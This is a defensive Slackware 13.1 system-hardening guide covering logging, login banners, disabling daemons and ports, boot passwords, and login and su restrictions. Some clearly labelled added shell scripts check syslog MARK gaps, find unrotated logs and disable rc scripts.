Slackware System Hardening
Copyright (c) 2002, 2005, 2006, 2011 Jeffrey Denton
http://dentonj.freeshell.org/system-hardening-13.1.txt
Written by Jeffrey Denton <[email protected]>
19 March 2011
Version - 0.9.0
** NOTE **
Added 20 January 2021
This was never finished. Posting for my own reference.
This is written for:
$ cat /etc/slackware-version
Slackware 13.1.0
This is a list of some of the steps I take to improve the security on my
Slackware systems. It is by no means a complete list of everything that is
possible. You can either do all of the things listed here, or you can choose
the ones you feel would help secure your system.
WARNING: Hardening a system is a compromise between security
and usability. Some of the things I do would adversely
affect the usability of your system and may very well
break things. Please have one of the following on hand
just in case you lock yourself out of your system:
Tom's Rootboot -
http://www.toms.net/rb/
The "Live" CD that comes with the official
version of Slackware
The Slackware Install CDs
You should make a backup of anything that you feel is
important, would be hard to replace, or that you simply
could not do without BEFORE implementing anything listed
here.
If you don't understand what a setting or configuration
is doing, don't use it on your system.
The contents of this document are only meant to be used
on Slackware Linux.
Some of the settings are redundant (defense in depth) or
may conflict.
You have been warned.
Notes:
- The settings assume that only one user is on the system, "dentonj",
adjust as necessary.
- Associated man pages are listed for further information
- I will comment this document if I ever get around to it
- This is still a draft as there are many TODO items.
- Before making changes to a file, it's a good idea to make a copy
of the original file: cp syslog.conf syslog.conf.orig
----[ Keep Current ]----
http://www.slackware.com/security/
http://www.slackware.com/lists/
To subscribe to the Slackware Security mailing list, email:
[email protected]
with the phrase "subscribe slackware-security" in the body of the email.
----[ Logging ]----
/etc/rc.d/rc.syslog:
echo -n "/usr/sbin/syslogd -m 10 -r -h"
/usr/sbin/syslogd -m 10 -r -h
root@darkstar:~# /etc/rc.d/rc.syslog restart
Increase the timestamp interval from 20 minutes to 10 minutes. It is
commonly recommended to set the timestamp interval to 0 to prevent the logs
from filling up with "-- MARK --" entries. I've found that these entries
are sometimes the only indication that can be used to determine when a
system hung or crashed. The "-r" option enables the system to receive
syslog messages from remote hosts. The "-h" option allows syslog to
forward messages it receives from remote hosts. This allows syslog messages
to be logged on several systems for redundancy. Syslog messages that are
sent over the network are not encrypted and can be easily captured. Watch
out for syslog forwarding loops when using both "-r" and "-h".
There are two security concerns with using syslog to receive logs over the
network. The first is the information is not encrypted. The information
is vulnerable to being intercepted. The second security concern is that the
system accepting remote logs is vulnerable to a denial of service attack.
An attacker can fill up the filesystem by flooding the syslogd daemon. Use
IPTables to restrict who can send traffic to that port. Of course this
will not stop someone from spoofing traffic to appear to come from a
trusted source.
Opens UDP port 514.
man syslogd
man klogd
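As an added example (not part of the original document), the following script turns the author's use of the "-- MARK --" entries into a check: it reads a syslog file and reports every pair of consecutive MARK lines that are further apart than expected, which is where a hang or crash would show up. The log lines it ships with are constructed, and the 10 minute interval and the "Mon DD HH:MM:SS host -- MARK --" line format are assumptions taken from the rc.syslog setting above.

```shell
#!/bin/sh
# Added example, not from the original document. Finds gaps between
# "-- MARK --" entries in a syslog file; the author keeps MARK entries
# (syslogd -m 10) because they show roughly when a machine hung or
# crashed. Assumes the classic "Mon DD HH:MM:SS host -- MARK --" format
# and that the log covers a single day (a gap across midnight is
# corrected by adding 86400 seconds).

# mark_gaps FILE [THRESHOLD]
# Print one line for every pair of consecutive MARK entries that are more
# than THRESHOLD seconds apart. The default of 900 is the 600 second MARK
# interval plus some slack, so normal timing jitter is not reported.
# FILE may be "-" to read standard input.
mark_gaps() {
    file=$1
    threshold=${2:-900}
    awk -v threshold="$threshold" '
        / -- MARK --$/ {
            split($3, t, ":")
            secs = t[1] * 3600 + t[2] * 60 + t[3]
            stamp = $1 " " $2 " " $3
            if (have_prev) {
                gap = secs - prev
                if (gap < 0) gap += 86400
                if (gap > threshold)
                    printf "gap of %d seconds between %s and %s\n", gap, prev_stamp, stamp
            }
            prev = secs
            prev_stamp = stamp
            have_prev = 1
        }' "$file"
}

# Constructed sample log (not a real capture): MARKs every 10 minutes,
# then nothing between 02:20 and 03:10 while the machine was hung.
sample_log() {
    cat <<'EOF'
Mar 19 02:00:00 darkstar -- MARK --
Mar 19 02:03:11 darkstar sshd[1555]: Accepted publickey for dentonj from 192.168.1.3 port 40122 ssh2
Mar 19 02:10:00 darkstar -- MARK --
Mar 19 02:20:00 darkstar -- MARK --
Mar 19 03:10:00 darkstar -- MARK --
Mar 19 03:20:00 darkstar -- MARK --
EOF
}

# Real use: mark_gaps /var/log/messages
# Here the constructed sample is checked instead.
sample_log | mark_gaps -
```

The threshold argument is there because MARK entries are written on a timer and drift by a few seconds; raise it if your "-m" value is larger than 10.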
/etc/syslog.conf
# Log everything to a file
*.* -/var/log/messages
# Log everything to a tty (Ctrl-Alt-F12)
*.* /dev/tty12
# Log everything to a log host
*.* @192.168.1.2
# Display emergencies to everyone using wall
*.=emerg *
# Send alerts directly to the user's terminals
*.=alert root,dentonj
root@darkstar:~# /etc/rc.d/rc.syslog restart
The other option to logging everything to one file is to have a long
syslog.conf file that splits up the logs among multiple files. In most
cases, the default configuration file will do. Which method you decide on
using really comes down to user preference. The "-" keeps syslogd from
syncing the file every time an entry is written. This is a performance
feature that may cause the loss of information if the system crashes. If
performance is not a concern or if the idea of losing logging information
is a concern, then remove the "-".
man syslogd
This manpage has a great description of how to deal with troublesome
individuals.
man syslog.conf
/etc/logrotate.conf:
weekly
rotate 26
create
compress
shred
include /etc/logrotate.d
/var/log/wtmp {
monthly
create 0664 root utmp
rotate 6
}
/var/log/btmp {
monthly
create 0600 root root
rotate 6
}
Logrotate is run at 4:40 every day by cron. The file that starts logrotate
is /etc/cron.daily/logrotate. I like to keep logs for 6 months. Most
people will think this is excessive. Make sure you have enough hard drive
space to store 6 months worth of logs.
root@darkstar:~# less /var/lib/logrotate/status
This file will give you the status on what log files are configured to be
rotated and the last time they were rotated. Make sure that you have
not missed a log file.
root@darkstar:~# last
root@darkstar:~# last -f /var/log/wtmp.1.gz
root@darkstar:~# lastb
root@darkstar:~# lastb -f /var/log/btmp.1.gz
man logrotate
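The "make sure you have not missed a log file" check above can be scripted. The following is an added example, not part of the original document: it compares the files in a log directory against the entries in a logrotate status file and prints the ones logrotate has never seen. The status file format it assumes is the one shown by less /var/lib/logrotate/status (one quoted path and a date per line); the demo data is constructed.

```shell
#!/bin/sh
# Added example, not from the original document. Lists the log files in
# a directory that logrotate has never rotated, by comparing the directory
# contents against /var/lib/logrotate/status (the file the author reads
# with less). The status file lists one '"/path/to/log" YYYY-M-D' line
# per log that logrotate knows about.

# unrotated_logs STATUSFILE LOGDIR
# Print every regular file in LOGDIR that does not appear in STATUSFILE.
# Already-rotated copies (*.1, *.2.gz, ...) are skipped; those are what
# logrotate produces, not what it is supposed to track.
unrotated_logs() {
    status=$1
    logdir=$2
    for f in "$logdir"/*; do
        [ -f "$f" ] || continue
        case "$f" in
            *.gz|*.[0-9]) continue ;;
        esac
        grep -qF -- "\"$f\"" "$status" || echo "$f"
    done
    return 0
}

# Constructed demonstration (nothing here is copied from a real system):
# three live logs, one rotated archive, and a status file that only
# knows about two of the live logs. Prints the path of the log that is
# being missed, then cleans up.
demo_unrotated() {
    d=$(mktemp -d)
    s=$(mktemp)
    : > "$d/messages"
    : > "$d/secure"
    : > "$d/cron"
    : > "$d/messages.1.gz"
    printf 'logrotate state -- version 2\n"%s/messages" 2011-3-19\n"%s/secure" 2011-3-19\n' "$d" "$d" > "$s"
    unrotated_logs "$s" "$d"
    rm -rf "$d" "$s"
}

# Real use on Slackware: unrotated_logs /var/lib/logrotate/status /var/log
demo_unrotated
```

A file that shows up in the output either needs its own entry under /etc/logrotate.d or is one, like Xorg.0.log, that you have decided not to keep.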
/etc/logrotate.d/syslog:
/var/log/cron /var/log/debug /var/log/maillog /var/log/messages
/var/log/secure /var/log/spooler /var/log/sulog /var/log/syslog {
create 0640 root root
#mail [email protected]
#mailfirst
sharedscripts
postrotate
/bin/kill -HUP `cat /var/run/syslogd.pid \
2> /dev/null || true`
endscript
}
Even though I log everything to one file, I setup logrotate to backup all
of the log files. The only logs that I'm not interested in retaining are
those for Xorg or dmesg. Daemons such as Apache and vsftpd will have
logrotate.d settings listed below.
man logrotate
/etc/rc.d/rc.S:
# Update the current kernel level in the /etc/motd (Message Of The Day) file,
# if the first line of that file begins with the word 'Linux'.
# You are free to modify the rest of the file as you see fit.
#if [ -x /bin/sed ]; then
# /bin/sed -i "{1s/^Linux.*/$(/bin/uname -sr)\./}" /etc/motd
#fi
The last 3 lines are uncommented by default. Since I like to set a custom
message and provide a little less information about the system, I comment
out the lines above. The default comment above is self explanatory.
man motd
/etc/motd, /etc/issue.net, /boot/boot_message.txt:
****************************************************************
Unauthorized access prohibited; all access and activities not
explicitly authorized by the administrator are unauthorized.
All activities are monitored and logged. There is no privacy
on this system. Unauthorized access and activities or any
criminal activity will be reported to appropriate authorities.
****************************************************************
Or:
"You seem to be lost. Please return to your little corner of the Internet."
I use the first message for anyone that is logging into a system. From
what I've been told, if you don't have some sort of default message that
indicates that there is no privacy on this computer, there is the chance
that logs from it used in a court may possibly be thrown out. I've also
been told the opposite is true. But since that lawyer did not represent
me or look out for my best interests, I'll stick with the message.
I use the second message when I don't care about pursuing legal actions
for unauthorized activities and want to let the offender know this isn't
your ordinary computer.
Since we make a change to the message given by the boot loader, we have
to rerun lilo.
root@darkstar:~# lilo -v -p
If lilo returns an error, try to determine what the problem is and rerun
lilo before you reboot the system. Otherwise, you may end up with a
system that doesn't boot properly.
man issue
man motd
man lilo
/etc/rc.d/rc.local:
# Log icmp packets to syslog
/usr/sbin/icmpinfo -v -n -p -s -l
This will log icmp packets to syslog, except pings. There is the
potential problem that someone could flood your logs and fill up your
hard drive while logging ICMP packets.
man icmpinfo
/sbin/accton:
Process accounting is turned on by /etc/rc.d/rc.M. However, the log file
doesn't exist.
root@darkstar:~# touch /var/log/pacct
man ac
man 2 acct
man 5 acct
man accton
man sa
man lastcomm
info accounting
root@darkstar:~# ac -d
root@darkstar:~# ac -p
/etc/rc.d/rc.M:
Increase logging in cron.
/usr/sbin/crond -l7 >> /var/log/cron 2>&1
man crond
----[ Disable Daemons/Close Ports ]----
List the open sockets:
root@darkstar:~# netstat -peanutgw
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 0.0.0.0:37 0.0.0.0:* LISTEN 0 4117 1546/inetd
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 0 5556 1711/X
tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN 0 4120 1546/inetd
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 4151 1555/sshd
tcp6 0 0 :::6000 :::* LISTEN 0 5555 1711/X
tcp6 0 0 :::22 :::* LISTEN 0 4153 1555/sshd
udp 0 0 0.0.0.0:512 0.0.0.0:* 0 4119 1546/inetd
udp 0 0 0.0.0.0:37 0.0.0.0:* 0 4118 1546/inetd
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 0 7764 2250/icmpinfo
IPv6/IPv4 Group Memberships
Interface RefCnt Group
--------------- ------ ---------------------
lo 1 224.0.0.1
lo 1 ff02::1
eth0 1 ff02::1
wlan0 1 ff02::1
/etc/inetd.conf:
The following are running by default:
time - TCP port 37
time - UDP port 37
auth - TCP port 113
comsat - UDP port 512
Comment out the lines of the services that you don't need.
root@darkstar:~# grep -v "^#" /etc/inetd.conf
man inetd
man in.comsat
man in.identd
man grep
/etc/rc.d/rc.inetd:
root@darkstar:~# /etc/rc.d/rc.inetd stop
root@darkstar:~# chmod a-x /etc/rc.d/rc.inetd
man inetd
man chmod
/usr/X11R6/bin/startx:
defaultserverargs="-nolisten tcp"
Closes TCP port 6000+n, where n is $DISPLAY (the default is 0).
man Xserver
/etc/X11/xdm/Xservers:
:0 local /usr/bin/X -nolisten tcp :0
Closes TCP port 6000.
man Xserver
man xdm
/etc/X11/xdm/Xaccess:
Make sure everything is commented.
man xdm
/etc/rc.d/rc.4:
exec /usr/bin/xdm -nodaemon -udpPort 0
exec /usr/X11R6/bin/xdm -nodaemon -udpPort 0
Closes UDP port 177.
man xdm
/etc/X11/fs/config:
use-syslog = yes
no-listen = tcp
Closes TCP port 7100.
man xfs
/etc/rc.d/rc.inet2:
Most of the rc.scripts are started here. From the script:
"Uncomment or comment out sections depending on which
services your site requires."
There are three ways to stop daemons and services from being started. The
first way is to make the script starting the daemon or service
non-executable:
chmod 600 /etc/rc.d/rc.bind
The second way is to comment out the sections of this script that start
the daemon or service:
Lines 95-97:
# Start the BIND name server daemon:
# if [ -x /etc/rc.d/rc.bind ]; then
# /etc/rc.d/rc.bind start
# fi
If you are not going to use the services, you can remove the package.
Removing the package will not remove the rc.script. The scripts are
installed with the name rc.script.new and then renamed to rc.script.
root@darkstar:~# removepkg bind
Comment out the following lines:
Lines 20 - 37: Disable mounting of NFS filesystems
Lines 43 - 45: Disable RPC portmapper
Lines 63 - 68: Disable mount of SMB filesystems
Lines 79 - 81: Disable IPv4 packet forwarding
Lines 84 - 86: Disable inetd
Lines 95 - 97: Disable BIND
Lines 100 - 102: Disable NIS
Lines 109 - 111: Disable NFS server
/etc/rc.d/rc.M:
Comment out the following lines:
Lines 187 - 189: Disable dnsmasq
Lines 141 - 143: Disable snmpd
Lines 197 - 203: Disable CUPS and lpd
Lines 206 - 208: Disable netatalk
Lines 259 - 261: Disable atd
Lines 296 - 298: Disable saslauthd
Lines 301 - 303: Disable sendmail
Lines 321 - 323: Disable MySQL
Lines 326 - 328: Disable Apache
Lines 331 - 333: Disable OpenLDAP
Lines 337 - 339: Disable Samba
Lines 347 - 349: Disable SystemV init scripts
/etc/rc.d/rc.acpid:
Advanced Configuration and Power Interface event daemon
root@darkstar:~# /etc/rc.d/rc.acpid stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.acpid
Or:
root@darkstar:~# removepkg acpid
root@darkstar:~# rm -i /etc/rc.d/rc.acpid
This daemon doesn't open any ports.
/etc/rc.d/rc.alsa:
Advanced Linux Sound Architecture
root@darkstar:~# /etc/rc.d/rc.alsa stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.alsa
Or:
root@darkstar:~# removepkg alsa-utils
root@darkstar:~# removepkg alsa-lib
root@darkstar:~# removepkg alsa-oss
root@darkstar:~# rm -i /etc/rc.d/rc.alsa
This daemon doesn't open any ports.
/etc/rc.d/rc.atalk:
AppleTalk
root@darkstar:~# /etc/rc.d/rc.atalk stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.atalk
Or:
root@darkstar:~# removepkg netatalk
root@darkstar:~# rm -i /etc/rc.d/rc.atalk
Closes TCP port 548.
/etc/rc.d/rc.autofs:
Automount for FILE, NIS, and LDAP
root@darkstar:~# /etc/rc.d/rc.autofs stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.autofs
Or:
root@darkstar:~# removepkg autofs
root@darkstar:~# rm -i /etc/rc.d/rc.autofs
This daemon doesn't open any ports.
/etc/rc.d/rc.bind:
BIND
root@darkstar:~# /etc/rc.d/rc.bind stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.bind
Or:
root@darkstar:~# removepkg bind
root@darkstar:~# rm -i /etc/rc.d/rc.bind
Closes TCP ports 53 and 953.
Closes UDP ports 53 and 32768.
/etc/rc.d/rc.bluetooth:
Bluetooth stack for Linux
root@darkstar:~# /etc/rc.d/rc.bluetooth stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.bluetooth
Or:
root@darkstar:~# removepkg bluez
root@darkstar:~# removepkg bluez-firmware
root@darkstar:~# removepkg bluez-hcidump
root@darkstar:~# rm -i /etc/rc.d/rc.bluetooth
/etc/rc.d/rc.cups:
Common UNIX Printing System
root@darkstar:~# /etc/rc.d/rc.cups stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.cups
Or:
root@darkstar:~# removepkg cups
root@darkstar:~# rm -i /etc/rc.d/rc.cups
Closes TCP and UDP port 631.
/etc/rc.d/rc.dnsmasq:
A lightweight DHCP and caching DNS server
root@darkstar:~# /etc/rc.d/rc.dnsmasq stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.dnsmasq
Or:
root@darkstar:~# removepkg dnsmasq
root@darkstar:~# rm -i /etc/rc.d/rc.dnsmasq
Closes TCP and UDP port 53, 67, and 68.
/etc/rc.d/rc.fuse:
Filesystem in Userspace
root@darkstar:~# /etc/rc.d/rc.fuse stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.fuse
Or:
root@darkstar:~# removepkg fuse
root@darkstar:~# rm -i /etc/rc.d/rc.fuse
This daemon doesn't open any ports.
/etc/rc.d/rc.gpm:
General Purpose Mouse, you will more than likely want to keep this.
root@darkstar:~# chmod go-rwx /etc/rc.d/rc.gpm
This daemon doesn't open any ports.
/etc/rc.d/rc.hald:
The HAL Hardware Abstraction Layer, you will more than likely want to
keep this.
root@darkstar:~# chmod go-rwx /etc/rc.d/rc.hald
This daemon doesn't open any ports.
/etc/rc.d/rc.httpd:
Apache webserver
root@darkstar:~# /etc/rc.d/rc.httpd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.httpd
Or:
root@darkstar:~# removepkg httpd
root@darkstar:~# rm -i /etc/rc.d/rc.httpd
Closes TCP port 80.
/etc/rc.d/rc.inetd:
The Internet daemon
root@darkstar:~# /etc/rc.d/rc.inetd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.inetd
Or:
root@darkstar:~# removepkg inetd
root@darkstar:~# rm -i /etc/rc.d/rc.inetd
Closes TCP ports 37 and 113 (by default).
Closes UDP ports 37 and 512 (by default).
/etc/rc.d/rc.ip_forward:
IPv4 Packet Forwarding
root@darkstar:~# /etc/rc.d/rc.ip_forward stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.ip_forward
The script is part of a package of network scripts that should not be
removed.
/etc/rc.d/rc.messagebus:
D-Bus message bus system
root@darkstar:~# /etc/rc.d/rc.messagebus stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.messagebus
Or:
root@darkstar:~# cd /var/log/packages && removepkg dbus*
root@darkstar:~# rm -i /etc/rc.d/rc.messagebus
/etc/rc.d/rc.mysqld:
The MySQL server daemon
By default, mysqld will not start. Read the /etc/rc.d/rc.mysqld file for
details on how to start the daemon.
The script prevents incoming network connections by default with the
"--skip-networking" option. If this option is commented out, TCP port
3306 will be opened.
root@darkstar:~# /etc/rc.d/rc.mysqld stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.mysqld
Or:
root@darkstar:~# removepkg mysql
root@darkstar:~# rm -i /etc/rc.d/rc.mysqld
This daemon doesn't open any ports by default.
/etc/rc.d/rc.nfsd:
The knfsd NFS daemon
By default, the daemon will not start because the file /etc/exports is not
configured properly.
root@darkstar:~# /etc/rc.d/rc.nfsd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.nfsd
Or:
root@darkstar:~# removepkg nfs-utils
root@darkstar:~# rm -i /etc/rc.d/rc.nfsd
/etc/rc.d/rc.ntpd:
Network Time Protocol
root@darkstar:~# /etc/rc.d/rc.ntpd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.ntpd
Or:
root@darkstar:~# removepkg ntp
root@darkstar:~# rm -i /etc/rc.d/rc.ntpd
Closes TCP and UDP port 123.
/etc/rc.d/rc.rpc:
RPC portmapper
root@darkstar:~# /etc/rc.d/rc.rpc stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.rpc
Or:
root@darkstar:~# removepkg portmap
root@darkstar:~# rm -i /etc/rc.d/rc.rpc
/etc/rc.d/rc.samba:
The Samba SMB file/print server
By default, the daemon will not start because the file /etc/samba/smb.conf
is not present.
root@darkstar:~# /etc/rc.d/rc.samba stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.samba
Or:
root@darkstar:~# removepkg samba
root@darkstar:~# rm -i /etc/rc.d/rc.samba
/etc/rc.d/rc.saslauthd:
Simple Authentication and Security Layer
root@darkstar:~# /etc/rc.d/rc.saslauthd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.saslauthd
Or:
root@darkstar:~# removepkg cyrus-sasl
root@darkstar:~# rm -i /etc/rc.d/rc.saslauthd
/etc/rc.d/rc.sendmail:
Sendmail
root@darkstar:~# /etc/rc.d/rc.sendmail stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.sendmail
Or:
root@darkstar:~# removepkg sendmail
root@darkstar:~# removepkg sendmail-cf
root@darkstar:~# rm -i /etc/rc.d/rc.sendmail
Closes TCP ports 25 and 587.
/etc/rc.d/rc.snmpd:
Simple Network Management Protocol
root@darkstar:~# /etc/rc.d/rc.snmpd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.snmpd
Or:
root@darkstar:~# removepkg net-snmp
root@darkstar:~# rm -i /etc/rc.d/rc.snmpd
/etc/rc.d/rc.sshd:
The Secure Shell Server
root@darkstar:~# /etc/rc.d/rc.sshd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.sshd
Or:
root@darkstar:~# removepkg openssh
root@darkstar:~# rm -i /etc/rc.d/rc.sshd
Closes TCP port 22.
/etc/rc.d/rc.syslog:
The system logging daemon, you will more than likely want to keep this.
If the "-r" option is used, UDP port 514 is opened.
This daemon doesn't open any ports by default.
root@darkstar:~# chmod 600 /etc/rc.d/rc.syslog
/etc/rc.d/rc.sysstat:
System performance monitoring tools
root@darkstar:~# /etc/rc.d/rc.sysstat stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.sysstat
Or:
root@darkstar:~# removepkg sysstat
root@darkstar:~# rm -i /etc/rc.d/rc.sysstat
/etc/rc.d/rc.sysvinit:
"This file provides basic compatibility with SystemV style startup
scripts."
Unless you have installed a daemon that requires the use of SystemV
style startup scripts, there is no need for it to be executable.
root@darkstar:~# chmod 600 /etc/rc.d/rc.sysvinit
/etc/rc.d/rc.udev:
"udev provides a dynamic device directory containing only the files for
actually present devices. It creates and removes device node files
usually located in the /dev directory." You will more than likely want
to keep this.
This daemon doesn't open any ports.
root@darkstar:~# chmod 600 /etc/rc.d/rc.udev
man udev
/etc/rc.d/rc.wireless.conf:
This file holds the configuration settings used by /etc/rc.d/rc.wireless.
The file may hold encryption keys in plain text. Make sure that users
are not able to read this file (the default setting).
root@darkstar:~# chmod 600 /etc/rc.d/rc.wireless.conf
/etc/rc.d/rc.yp:
The Network Information Service
The contents of this file are commented out by default.
root@darkstar:~# chmod 600 /etc/rc.d/rc.yp
Or:
root@darkstar:~# removepkg yptools
root@darkstar:~# rm -i /etc/rc.d/rc.yp
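The stop/chmod steps repeated for each service above can be wrapped in a function and followed by a check of what is still executable, since rc.inet2 and rc.M only start a script that has its execute bit set. This is an added example and not from the original document; the rc directory is passed as an argument so the functions can be tried on a scratch copy first, and the scripts the demo creates are constructed stand-ins for the real rc scripts.

```shell
#!/bin/sh
# Added example, not from the original document. Wraps the
# "stop the daemon, then chmod 600 its rc script" pattern from the
# section above and adds a check that lists which rc scripts are still
# executable. The directory is a parameter so the functions can be
# exercised against a scratch directory before touching /etc/rc.d.

# disable_rc RCDIR NAME
# Stop the service (only if its script is currently enabled, i.e.
# executable) and clear the execute bits so it is not started at boot.
# Returns 0 when the script ends up non-executable, 1 if it is missing.
disable_rc() {
    rcdir=$1
    name=$2
    script="$rcdir/rc.$name"
    if [ ! -e "$script" ]; then
        echo "disable_rc: no such script: $script" >&2
        return 1
    fi
    if [ -x "$script" ]; then
        sh "$script" stop
    fi
    chmod 600 "$script"
    [ ! -x "$script" ]
}

# list_enabled RCDIR
# Print the names of the rc.* scripts in RCDIR that are still executable,
# which is the set rc.inet2 / rc.M would start on the next boot.
list_enabled() {
    for s in "$1"/rc.*; do
        [ -f "$s" ] && [ -x "$s" ] && echo "${s##*/}"
    done
    return 0
}

# Constructed demonstration in a scratch directory standing in for
# /etc/rc.d: two enabled services, one already disabled. The fake
# rc.bind records the action it was called with.
demo_disable() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho "rc.bind $1" > "%s/bind.state"\n' "$d" > "$d/rc.bind"
    printf '#!/bin/sh\necho "rc.sshd $1"\n' > "$d/rc.sshd"
    printf '#!/bin/sh\necho "rc.cups $1"\n' > "$d/rc.cups"
    chmod 755 "$d/rc.bind" "$d/rc.sshd"
    chmod 600 "$d/rc.cups"
    disable_rc "$d" bind
    echo "stop action recorded: $(cat "$d/bind.state")"
    echo "still enabled: $(list_enabled "$d" | tr '\n' ' ')"
    rm -rf "$d"
}

# Real use: disable_rc /etc/rc.d bind && list_enabled /etc/rc.d
demo_disable
```

Running list_enabled against /etc/rc.d after the edits is a quick way to confirm that nothing you meant to turn off is still set to start, and to compare with the netstat output from the start of this section.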
----[ Limit Access ]----
/etc/rc.d/rc.M:
chmod 1733 /tmp /var/tmp
Prevents users from looking at the contents of those directories. It still
allows them to create, access, and modify files in those directories if
they know the actual file name. This does not stop users from running
executables in /tmp.
dentonj@darkstar:~$ ls -ld /tmp
drwx-wx-wt 5 root root 4096 2001-06-27 12:54 /tmp/
dentonj@darkstar:~$ cp /bin/date /tmp/test
dentonj@darkstar:~$ /tmp/test
Thu Jun 27 12:55:00 MST 2001
dentonj@darkstar:~$ ls /tmp
ls: /tmp: Permission denied
man chmod
/etc/rc.d/rc.S:
chmod 1733 /tmp/.ICE-unix
chmod 1733 /tmp/.X11-unix
Don't let everyone have read access to utmp:
chmod 660 /var/run/utmp
man utmp
man chmod
/etc/lilo.conf:
# mandatory - enter a password with every boot
# restricted - enter a password only when a boot time parameter
# is used (e.g. - "linux single")
# Pick one
mandatory
#restricted
# Use the "-p" option with the lilo command to store the hashed password
# in a separate file
password=""
prompt
timeout=0
#menu-title="Unauthorized Access Prohibited"
message=/boot/boot_message.txt
serial=0,9600n8
root@darkstar:~# lilo -v -p
root@darkstar:~# chmod go-rwx /etc/lilo.conf
Using the setting 'password=""' and then the '-p' option with lilo will
prompt you to enter a pass phrase while lilo is running. The pass phrase
is hashed and stored in /etc/lilo.conf.shs. The man page for lilo claims
that the hashed pass phrase is stored in /etc/lilo.conf.crc. Either way,
it's better than having the password listed in /etc/lilo.conf in plain
text. The configuration options above will require the password to be
entered whenever the system boots. You may not want to use the "mandatory"
setting if uptime is important or when you normally only access the system
remotely. In these cases, use "restricted" instead.
man lilo
man lilo.conf
/etc/login.access:
+:root dentonj:LOCAL
-:ALL:ALL
Only root and dentonj can login locally. This does not affect logging in
via ssh.
Error generated: "Login incorrect"
man login.access
/etc/login.defs:
FAIL_DELAY 15
LOG_UNKFAIL_ENAB yes
LOG_OK_LOGINS yes
SULOG_FILE /var/log/sulog
ISSUE_FILE /etc/issue
#HUSHLOGIN_FILE
UMASK 077
PASS_MAX_DAYS 90
PASS_MIN_LEN 18
ENCRYPT_METHOD SHA512
SHA_CRYPT_MIN_ROUNDS 500000
SHA_CRYPT_MAX_ROUNDS 500000
DEFAULT_HOME no
#ENVIRON_FILE
root@darkstar:~# touch /var/log/sulog
root@darkstar:~# passwd
root@darkstar:~# chage -M 90 -W 7 root
root@darkstar:~# chage -M 90 -W 7 dentonj
dentonj@darkstar:~$ passwd
Setting the number of SHA rounds to 500000 means that it takes a little
longer to login. If you are using a slow computer, you may have to
adjust the number of rounds used.
man login.defs
man passwd
/etc/suauth:
ALL:ALL EXCEPT dentonj:DENY
Or:
ALL:ALL EXCEPT GROUP wheel:DENY
root@darkstar:~# usermod -g users -G wheel dentonj
root@darkstar:~# chmod go-rwx /etc/suauth
Only dentonj is allowed to switch users. Or, only members of the wheel
group can switch users.
Error generated: "Access to su to that account DENIED."
"You are not authorized to su root"
man suauth
/etc/porttime:
*:root,dentonj:Al0000-2400
*:*:
root@darkstar:~# chmod go-rwx /etc/porttime
The third field lists the times that a user is allowed to log in. If that
field is empty, the user is not allowed to log in at all. The "*:*:" entry
is a default deny rule to catch everyone not already listed.
The daemon logoutd is normally run to enforce the login time restrictions
listed in /etc/porttime.
Error generated: "Invalid login time"
man porttime
/etc/rc.d/rc.local:
# Enforce login time restrictions set in /etc/porttime
if [ -x /usr/sbin/logoutd ]; then
/usr/sbin/logoutd
fi
man logoutd
/etc/limits:
dentonj C0L1
* L0
root@darkstar:~# chmod go-rwx /etc/limits
The setting "* L0" is a default rule for anyone not previously listed. The
number of logins permitted is set to zero, which means anyone not
previously listed is not allowed to log in. This does not affect root.
The "C0" setting keeps users from creating core dumps.
Error generated: "Too many logins."
man limits
/etc/shells:
Allowing users to run different shells allows them to bypass any security
restrictions set on their login shell.
Delete the following:
/bin/ash
/bin/csh
/bin/ksh
/bin/tcsh
/bin/zsh
root@darkstar:~# removepkg ash
root@darkstar:~# removepkg ksh93
root@darkstar:~# removepkg tcsh
root@darkstar:~# removepkg zsh
man shells
/usr/sbin/faillog:
root@darkstar:~# faillog -u dentonj -m 10
root@darkstar:~# faillog -a
Don't set faillog for root. This is one of the few settings that can
actually stop root from logging in. Using faillog can cause a denial of
service if the maximum number of failed logins is reached. Use faillog
with caution.
Error generated: "Login incorrect"
man faillog
/etc/passwd:
According to the Linux Standard Base Specification 4.1, the only required
user accounts are root, bin, and daemon. All other accounts are optional.
Delete any unused accounts. The following lists the number of files and
directories that are owned by each account.
root@darkstar:~# for i in `cat /etc/passwd | awk -F: '{print $1}'`; do
> echo -n "$i - "
> find / -user $i -ignore_readdir_race | wc -l
> done
root - 374210
bin - 3
daemon - 10
adm - 0
lp - 1
sync - 0
shutdown - 0
halt - 0
mail - 0
news - 46
uucp - 17
operator - 0
games - 4
ftp - 0
smmsp - 1
mysql - 2
rpc - 0
sshd - 0
gdm - 0
oprofile - 0
apache - 0
messagebus - 7
haldaemon - 14
pop - 0
nobody - 3
dentonj - 2595
Your numbers may vary. To list the files owned by a particular user:
root@darkstar:~# find / -user nobody -ls
Logins and ownership of files and directories are not the only use for
accounts. They can also be used to run daemons as a non-root user.
The current processes and the accounting information can be used to
determine which accounts are used.
